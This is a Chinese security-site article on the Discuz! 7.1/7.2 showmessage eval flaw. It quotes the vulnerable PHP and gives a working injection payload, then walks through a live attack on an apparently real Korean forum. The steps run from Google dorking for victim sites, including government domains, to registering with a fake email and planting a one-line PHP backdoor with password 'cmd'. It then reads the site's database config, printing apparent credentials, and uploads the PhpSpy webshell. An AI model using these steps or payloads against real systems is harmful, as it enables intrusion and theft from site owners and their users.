【51CTO.com 獨(dú)家特稿】Crossday Discuz! Board 論壇系統(tǒng)（簡(jiǎn)稱 Discuz! 論壇）是一個(gè)采用 PHP 和 MySQL 等其它多種數(shù)據(jù)庫(kù)構(gòu)建的高效論壇解決方案。作為商業(yè)軟件產(chǎn)品， Discuz! 在代碼質(zhì)量，運(yùn)行效率，負(fù)載能力，安全等級(jí)，功能可操控性和權(quán)限嚴(yán)密性等方面有著良好的口碑。對(duì)于站長(zhǎng)而言，利用 Discuz! 均能夠在最短的時(shí)間內(nèi)，花費(fèi)最低的費(fèi)用，采用最少的人力，架設(shè)一個(gè)性能優(yōu)異、功能全面、安全穩(wěn)定的社區(qū)論壇平臺(tái)。它能運(yùn)行于Windows平臺(tái)和Linux平臺(tái)，目前已經(jīng)有超過(guò)100萬(wàn)的用戶。在本文以前Discuz! 論壇即時(shí)有漏洞也因?yàn)榉N種原因難以獲取Webshell，而本次出現(xiàn)的漏洞只要是注冊(cè)用戶即可輕松獲取Webshell。在Discuz！ 7.1與7.2版本中的showmessage函數(shù)，由于eval中執(zhí)行的參數(shù)未初始化，可以任意提交，從而可以執(zhí)行任意PHP命令。該漏洞的首發(fā)是T00ls核心團(tuán)隊(duì)，下面來(lái)分析下這個(gè)遠(yuǎn)程代碼執(zhí)行漏洞，這個(gè)問(wèn)題真的很嚴(yán)重，可以直接寫shell。

一、漏洞來(lái)自showmessage函數(shù)
function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) {
extract($GLOBALS, EXTR_SKIP);//危險(xiǎn)的用法，未初始化的變量可以直接帶進(jìn)函數(shù)，直接導(dǎo)致了問(wèn)題產(chǎn)生，from www.oldjun.com
global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;

#p#

二、DZ的全局機(jī)制導(dǎo)致了未初始化的參數(shù)可以任意提交

foreach(array('_COOKIE', '_POST', '_GET') as $_request) {

    foreach($$_request as $_key => $_value) {

        $_key{0} != '_' && $$_key = daddslashes($_value);

    }

}

#p#

三、misc.php正好有個(gè)可以自定義message的點(diǎn)，其實(shí)也是未初始化：

 

 

elseif($action == 'imme_binding' && $discuz_uid) {

    if(isemail($id)) {

        $msn = $db->result_first("SELECT msn FROM {$tablepre}memberfields WHERE uid='$discuz_uid'");

        $msn = explode("\t", $msn);

        $id = dhtmlspecialchars(substr($id, 0, strpos($id, '@')));

        $msn = "$msn[0]\t$id";

        $db->query("UPDATE {$tablepre}memberfields SET msn='$msn' WHERE uid='$discuz_uid'");

        showmessage('msn_binding_succeed', 'memcp.php');

    } else {

        if($result == 'Declined') {

            dheader("Location: memcp.php");

        } else {

            showmessage($response['result']);//$response沒(méi)有初始化，可以自定義，from www.oldjun.com

        }

    }

   }

 

#p#

四、漏洞利用
showmessage函數(shù)里$vars = explode(':', $message);然后message可以自己控制，于是就很容易了，參數(shù)是兩個(gè)自定義的數(shù)組。注冊(cè)一個(gè)用戶登陸,然后提交misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}

#p#

五、漏洞的具體應(yīng)用

1.搜索“Powered by Discuz!7.2”
在Google中進(jìn)行Discuz!7.2的定位搜索，在Google輸入框中輸入“Powered by Discuz!7.2 site:kr”搜索韓國(guó)的Discuz!7.2版本的站點(diǎn)，如圖1所示，結(jié)果出來(lái)有3380條記錄。想搜索哪個(gè)國(guó)家的就直接在site后面進(jìn)行變更，例如搜索國(guó)內(nèi)的網(wǎng)站：“site:com.cn”，政府網(wǎng)站“site:org.cn”。

 

圖1定位搜索Discuz!7.2版本的論壇

#p#

2.驗(yàn)證并注冊(cè)論壇用戶

在圖1中從第一個(gè)往最末記錄，依次打開搜索記錄，如圖2所示，第一個(gè)記錄技能打開，而且在其中還顯示為中文，單擊注冊(cè)鏈接，注冊(cè)為開論壇的一個(gè)用戶。注冊(cè)用戶時(shí)用戶名和密碼可以隨意選取，只要不重復(fù)即可，如果不想接收網(wǎng)站的注冊(cè)信件，防止被他人利用電子郵件進(jìn)行其它活動(dòng)可以使用假的郵件地址，如圖3所示，總之目的只有一個(gè)那就是成為該論壇的會(huì)員，便于后期得到Webshell。

 

圖2 查看搜索結(jié)果

 

圖3 注冊(cè)用戶

#p#

3.修改exp代碼中的地址

discuz7.2 exp是由T00ls.net放出來(lái)的，呵呵，版權(quán)屬于他們哦！如圖4所示，在修改action的地址為“http://**********.co.kr/dc/misc.php”，該地址是misc.php的實(shí)際地址，修改完畢后保存即可。

 

圖4修改exp代碼中的地址

 

#p#

4.獲取TID并提交

用戶注冊(cè)成功后，在論壇中通過(guò)觀看最新帖子可以看到地址欄中包含有TID一項(xiàng)，例如“http://www.antian365.com/redirect.php?tid=5634&goto=lastpost#lastpost”，其中的tid為“5634”。Tid顧名思義就是帖子ID。獲取該ID后在exp中將該ID輸入后進(jìn)行提交，如圖5所示。

 

圖5 獲取tid并將其放入exp中進(jìn)行提交

技巧：
（1）在有些大的論壇中由于使用了優(yōu)化技術(shù)，因此論壇的頁(yè)面都是靜態(tài)的，在靜態(tài)的頁(yè)面中是看不到tid的，例如“http://bbs.51cto.com/thread-648810-1.html”，但當(dāng)鼠標(biāo)移動(dòng)到回復(fù)按鈕處時(shí)會(huì)給出一個(gè)地址，該地址中包含有tid。
（2）Exp提交成功后會(huì)出現(xiàn)一些提示，如果給出“Binding Failed.Visit MSN IMME Q&A,Please.”提示，如圖6所示，則說(shuō)明該系統(tǒng)已經(jīng)修補(bǔ)了漏洞或者采取了一些安全措施，無(wú)法再進(jìn)行利用。

 

圖6 未能成功的exp

（3）一句話木馬成功與否的測(cè)試。直接在論壇地址后加上“/forumdata/cache/usergroup_01.php”進(jìn)行訪問(wèn)，例如某網(wǎng)站的論壇地址為：
http://www.xxx.com.hk/discuz/，則一句話后門的地址為：
http://www.xxx.com.hk/discuz/forumdata/cache/usergroup_01.php
如果訪問(wèn)后未出現(xiàn)錯(cuò)誤提示，那么恭喜你，成功了！
#p#

5.獲取Webshell

如圖7所示，在“l(fā)anker一句話PHP后門客戶端3.0內(nèi)部版”的后門地址中輸入剛才提交的地址“http://**********.co.kr/dc/forumdata/cache/usergroup_01.php”，密碼是“cmd”。在模塊中選擇查看服務(wù)器基本信息，如圖7所示，獲悉該系統(tǒng)為linux系統(tǒng)以及該網(wǎng)站所在的文件路徑。

 

圖7 一句話后門執(zhí)行成功

#p#

6.讀取數(shù)據(jù)庫(kù)連接文件

在模塊中選擇讀取文件，并輸入數(shù)據(jù)庫(kù)連接文件的地址“****/dc/config.inc.php”，如圖8所示，成功獲取該論壇數(shù)據(jù)庫(kù)的敏感信息：
$dbhost = 'localhost'; // 數(shù)據(jù)庫(kù)服務(wù)器
$dbuser = 'skycheer'; // 數(shù)據(jù)庫(kù)用戶名
$dbpw = 'sky0127'; // 數(shù)據(jù)庫(kù)密碼
$dbname = 'skycheer'; // 數(shù)據(jù)庫(kù)名
$pconnect = 0;
 

 

圖8獲取論壇數(shù)據(jù)庫(kù)連接信息

#p#

7.上傳大馬

使用一句話管理實(shí)在是不方便，在功能模塊中選擇上傳文件，使用空的路徑直接將本地的大馬上傳到一句話木馬所在的路徑，上傳成功后直接訪問(wèn)，如圖9所示，成功得到我們熟悉的PhpSpy ver 2008界面。至此已經(jīng)獲取Discuz！7.2版本的Webshell，大家都知道Discuz！論壇的Webshell很難拿到，因此本漏洞的珍稀程度可想而知。

 

圖9 上傳大馬

#p#

8.后記

 Discuz！7.1&7.2遠(yuǎn)程溢出漏洞出來(lái)后，國(guó)內(nèi)有關(guān)Discuz！的大中小論壇基本沒(méi)有什么幸免，安全做的好的去掉了cache的執(zhí)行權(quán)限，將其權(quán)限設(shè)置為無(wú)，逃過(guò)劫難。

【編輯推薦】

1. WebLogic嚴(yán)重安全漏洞出現(xiàn) 甲骨文忙于修補(bǔ)
2. 2010黑帽大會(huì)：IE漏洞如何將PC變成公用文件服務(wù)器
3. 微軟下周將修復(fù)存在17年的漏洞